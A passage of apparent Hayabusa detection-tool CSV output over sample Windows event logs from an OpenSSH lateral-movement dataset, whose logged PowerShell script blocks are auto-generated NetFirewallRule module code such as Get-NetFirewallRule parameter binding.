Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
$__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ 
Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and 